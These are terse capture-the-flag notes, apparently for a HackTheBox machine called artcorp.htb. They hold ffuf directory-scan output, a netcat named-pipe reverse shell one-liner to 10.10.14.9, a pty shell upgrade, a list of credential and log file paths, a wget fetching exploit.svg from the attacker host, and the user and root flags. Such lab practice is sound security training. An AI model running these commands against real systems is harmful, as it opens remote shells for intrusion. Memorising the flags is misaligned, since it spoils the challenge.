000001492:   200        9 L      24 W       247 Ch      "dev01 - dev01"
Found Subdomain
ffuf dir scan
 :: Method           : GET
 :: URL              : http://dev01.artcorp.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 404
________________________________________________

                        [Status: 200, Size: 247, Words: 16, Lines: 10]
.htpasswd               [Status: 403, Size: 199, Words: 14, Lines: 8]
.htaccess               [Status: 403, Size: 199, Words: 14, Lines: 8]
.hta                    [Status: 403, Size: 199, Words: 14, Lines: 8]
index.php               [Status: 200, Size: 247, Words: 16, Lines: 10]
server-status           [Status: 403, Size: 199, Words: 14, Lines: 8]

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh | nc 10.10.14.9 1234 > /tmp/f

python3 -c "import pty; pty.spawn('/bin/bash')"
/home/thomas/user.txt
/usr/local/bin/convert_images.sh
/usr/bin/gettext.sh
/var/log/daemon.log
/var/log/auth.log
/var/log/syslog
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/lintian/overrides/passwd
wget http://10.10.14.9:8000/exploit.svg

User flag: 6d87543fcfc6c01fbeaf8a216e17f0c6
Root flag: 0299fcf56aba0516d902fbb229abbcf0
